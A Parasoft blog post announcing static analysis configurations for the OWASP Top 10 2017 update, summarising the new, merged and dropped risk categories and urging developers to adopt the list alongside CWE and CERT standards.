Supporting the new 2017 Update to the OWASP Top 10
OWASP Top 10 – 2017 Update
Today OWASP released the latest version of the OWASP Top 10 – 2017. This application security list has become one of the most important security standards available, and I'm excited to say that static analysis configurations for Parasoft tools that support the 2017 list are already available on the Parasoft forum. We know this standard is important for you, and we’ve worked hard to make sure you can get started right away, today, now!
Learn more about the 2017 OWASP update below.
OWASP Top 10 Overview
For many years now, the Open Web Application Security Project (OWASP) has been a great resource of information and training about application security. Every few years, they put together the well-known OWASP Top 10 list that lays out important current security issues facing web developers. Over time, the standard has become perhaps the most common starting place for organizations getting started with securing their web applications.
And for good reason – the OWASP Top 10 is based on several different types of information, updated to reflect new security risks. A primary source is information from AppSec firms and an industry survey, which yields information on the problems currently plaguing organizations in the real world. Some of the new Top 10 items also come from community input, based on important issues.
So, what’s new for 2017? As the new document says:
“We've completely refactored the OWASP Top 10, revamped the methodology, utilized a new data call process, worked with the community, re-ordered our risks, re- written each risk from the ground up, and added references to frameworks and languages that are now commonly used.”
- A4:2017 – XL External Entities (XXE) - which allows attackers to exploit vulnerable XML processors
- A8:2017 – Insecure Deserialization - which permits remote code execution or sensitive object manipulation on affected platforms
- A10:2017 – Insufficient Logging and Monitoring - the lack of which can prevent or significantly delay malicious activity and breach detection, incident response, and digital forensics
A4:2013 – Insecure Direct Object References and A7:2013 – Missing Function Level Access Control were merged into the new A5:2017– Broken Access Control.
A8:2013 – Cross-Site Request Forgery (CSRF) - as it turns out, many frameworks now protect against CSRF, and it was round in only 5% of applications during the data analysis.
A10:2013 – Unvalidated Redirects and Forward. - this one was in about 8% of applications, which was just a bit less than the new item on the list – XXE.
Unsurprisingly, tainted data remains a huge problem, as we see in A1:2017 – Injection. This is a problem that serious defensive programming is very effective against, but somehow, we keep trying to work on this by testing it in. It’s time to get serious and remove this one from the next Top 10 in 2020. Let’s all do our part!
A3:2017 – Sensitive Data Exposure is a great place to start if the EU General Data Protection Regulation (GDPR) is on your radar. The current countdown on the GDPR home page shows 185 days until enforcement starts, so start fixing your code today. This is also obviously helpful in the U.S., for any requirements around privacy like PCI-DSS and HIPAA. Protect your users’ data with proper access controls and encryption. Data breaches are an all-to-common event.
One area that I love in particular about the latest OWASP Top 10, is that each Top 10 now comes with explicit links to items in the Common Weakness Enumeration (CWE), where you can learn more about what the problem is, why it matters, and how to eliminate the weakness. You can also easily find related issues this way for items that are the most important for you. The CWE Top 25 is a perfect next-step once you have the OWASP Top 10 locked down.
What you should do:
First, go download the pdf for the OWASP Top 10 – 2017 and read it through. It’s rich with information about what the problem is and how to start removing it from your applications. Then, add it to your security policy and make sure your team of developers and testers are trained on it. Adding configurations for security tools like static analysis and penetration testing will help enforce this effort. At Parasoft, we have already put configurations for our static analysis tools in our forums.
Remember, the OWASP Top 10 is a starting point, not a destination. It lists the most important issues that are most likely to affect your web application. Once you’ve got a handle on it, you need to keep improving by using expanded standards like CWE and SEI CERT Secure Coding Standards. This will help you broaden your security footing and prepare you for the security challenges ahead.
Arthur has been involved in software security and test automation at Parasoft for over 25 years, helping research new methods and techniques (including 5 patents) while helping clients improve their software practices.